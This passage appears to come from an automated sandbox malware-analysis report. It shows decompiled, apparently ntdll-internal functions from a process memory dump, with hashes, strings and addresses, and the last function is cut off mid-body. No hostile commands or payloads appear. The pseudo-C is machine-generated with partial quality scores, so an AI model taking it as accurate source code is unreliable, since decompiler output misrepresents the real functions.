                                                      • Instruction ID: edf34fade541a4424428c982ad35b96eb0c2020f3ad020b76e2efc3ef24a498d
                                                      • Opcode Fuzzy Hash: 4621ff35affc289b615c66ddc837cb416e5102523aec307f85691b99527635b8
                                                      • Instruction Fuzzy Hash: 243187B15483059FD711DF28C99095BBBE9EBC6758F000A3EF99593250E638ED04DB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04911B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 72%
                                                      			E04911B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0494BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0494A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0494A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L04924620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                      0x04911b8f
                                                      0x04911b9a
                                                      0x04911b9c
                                                      0x04911b9e
                                                      0x04911ba3
                                                      0x04967010
                                                      0x04967010
                                                      0x00000000
                                                      0x04911ba9
                                                      0x04911ba9
                                                      0x04911bae
                                                      0x00000000
                                                      0x04911bc5
                                                      0x04911bca
                                                      0x04911bcf
                                                      0x04911bd0
                                                      0x04911bd1
                                                      0x04911bd2
                                                      0x04911bd6
                                                      0x04911bdc
                                                      0x04911be0
                                                      0x04966ffc
                                                      0x04967000
                                                      0x00000000
                                                      0x04967006
                                                      0x04967009
                                                      0x04967009
                                                      0x04911be6
                                                      0x04911bec
                                                      0x04911c0b
                                                      0x04911c0b
                                                      0x04911c0c
                                                      0x04911c11
                                                      0x04911c12
                                                      0x04911c15
                                                      0x04911c1b
                                                      0x04911c1f
                                                      0x04911c31
                                                      0x04911c33
                                                      0x04967026
                                                      0x04967026
                                                      0x04911c21
                                                      0x04911c24
                                                      0x04911c24
                                                      0x04911bee
                                                      0x04911bee
                                                      0x04911bf2
                                                      0x04911c3a
                                                      0x04911bf4
                                                      0x04911bf4
                                                      0x04911c05
                                                      0x04911c05
                                                      0x04911c09
                                                      0x04911c3e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04911c09
                                                      0x04911bec
                                                      0x04911be0
                                                      0x04911bae
                                                      0x04911c2e

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID: WindowsExcludedProcs
                                                      • API String ID: 0-3583428290
                                                      • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                      • Instruction ID: 789a43efb93d96183c16018febdd674aefd31c6464ef11bffb44c584fd01ecfd
                                                      • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                      • Instruction Fuzzy Hash: 4121F536A0026CBBDB219ED9C841F5BB7ADAF89754F054475FA059B224E630FD0097A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0492F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0492F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                      0x0492f71d
                                                      0x0492f722
                                                      0x0492f726
                                                      0x04974770
                                                      0x0492f765
                                                      0x0492f769
                                                      0x0492f769
                                                      0x0492f732
                                                      0x0497477a
                                                      0x00000000
                                                      0x0497477a
                                                      0x0492f738
                                                      0x0492f73a
                                                      0x0492f73c
                                                      0x0492f73f
                                                      0x0492f746
                                                      0x0492f778
                                                      0x0492f7a9
                                                      0x0492f7a9
                                                      0x0492f754
                                                      0x0492f75a
                                                      0x0492f75d
                                                      0x0492f75f
                                                      0x0492f761
                                                      0x0492f76f
                                                      0x0492f771
                                                      0x0492f771
                                                      0x0492f76f
                                                      0x0492f763
                                                      0x00000000
                                                      0x0492f763
                                                      0x0492f77d
                                                      0x0492f7a3
                                                      0x0492f7a5
                                                      0x00000000
                                                      0x0492f7a5
                                                      0x0492f77f
                                                      0x0492f782
                                                      0x0492f784
                                                      0x0492f786
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0492f788
                                                      0x0492f748
                                                      0x0492f74d
                                                      0x0492f78d
                                                      0x0492f793
                                                      0x0492f7b7
                                                      0x0492f7bc
                                                      0x00000000
                                                      0x0492f7bc
                                                      0x0492f798
                                                      0x00000000
                                                      0x00000000
                                                      0x0492f79d
                                                      0x0492f7b0
                                                      0x00000000
                                                      0x0492f7b0
                                                      0x0492f79f
                                                      0x00000000
                                                      0x0492f74f
                                                      0x0492f74f
                                                      0x00000000
                                                      0x0492f74f

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Actx
                                                      • API String ID: 0-89312691
                                                      • Opcode ID: 3039673d749b8286ee7d199ec3976db57178c97947842ecd1b27b948cdf7ef5f
                                                      • Instruction ID: f4ec98f02f9a364853b44c4e6085036e153b4ec48bf5e0f0d373ff6b5ebc8a87
                                                      • Opcode Fuzzy Hash: 3039673d749b8286ee7d199ec3976db57178c97947842ecd1b27b948cdf7ef5f
                                                      • Instruction Fuzzy Hash: 051181353046228BE7244E1DC79063672BEEBC5724F24493AE861CB39DE670F840B340
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049B8DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 71%
                                                      			E049B8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x49e0d50);
				E0495D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E04995720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0495DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0495DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0495D130(_t34, _t39, _t40);
			}





                                                      0x049b8df1
                                                      0x049b8df1
                                                      0x049b8df1
                                                      0x049b8df1
                                                      0x049b8df1
                                                      0x049b8df1
                                                      0x049b8df3
                                                      0x049b8df8
                                                      0x049b8dfd
                                                      0x049b8e00
                                                      0x049b8e0e
                                                      0x049b8e2a
                                                      0x049b8e36
                                                      0x049b8e38
                                                      0x049b8e3c
                                                      0x049b8e46
                                                      0x049b8e46
                                                      0x049b8e36
                                                      0x049b8e50
                                                      0x049b8e56
                                                      0x049b8e59
                                                      0x049b8e5c
                                                      0x049b8e60
                                                      0x049b8e67
                                                      0x049b8e6d
                                                      0x049b8e73
                                                      0x049b8e74
                                                      0x049b8eb1
                                                      0x049b8ebd

                                                      Strings
                                                      • Critical error detected %lx, xrefs: 049B8E21
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Critical error detected %lx
                                                      • API String ID: 0-802127002
                                                      • Opcode ID: 3588f3d633614a0dbb2ab17cc38a2fcf27a291261e98827dd4c3b0e4de7b8b3c
                                                      • Instruction ID: 1d142344f063f1b7bd014288d0fa3604c2ece61eb26be44fda48c3604055eda1
                                                      • Opcode Fuzzy Hash: 3588f3d633614a0dbb2ab17cc38a2fcf27a291261e98827dd4c3b0e4de7b8b3c
                                                      • Instruction Fuzzy Hash: CC118B71D00348DBEF25EFA88A097DDBBB8BB48314F24826DD569AB291C3346602CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0499FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0499FF60
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                      • API String ID: 0-1911121157
                                                      • Opcode ID: 1b3fd92b7d7ec7163f21dff90f79e9ecac547ccdaed1082d14a0ff31824cc661
                                                      • Instruction ID: 94916ad53fbc444dd8d854e80404a0e88c8096b370baf4409a60b511d039cfb7
                                                      • Opcode Fuzzy Hash: 1b3fd92b7d7ec7163f21dff90f79e9ecac547ccdaed1082d14a0ff31824cc661
                                                      • Instruction Fuzzy Hash: 07118E71550144EFEF12EF54C948F98BBF1FF48719F258164E508962A1C779BD40CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049D5BA5, Relevance: .6, Instructions: 592COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 88%
                                                      			E049D5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x49e1178);
				E0495D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E049D4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0494D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E049D5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x49f60e8;
								if( *0x49f60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x49f60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E04949710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E04946DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0494F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0494F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0494F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0494FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0494FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0494F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0494F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
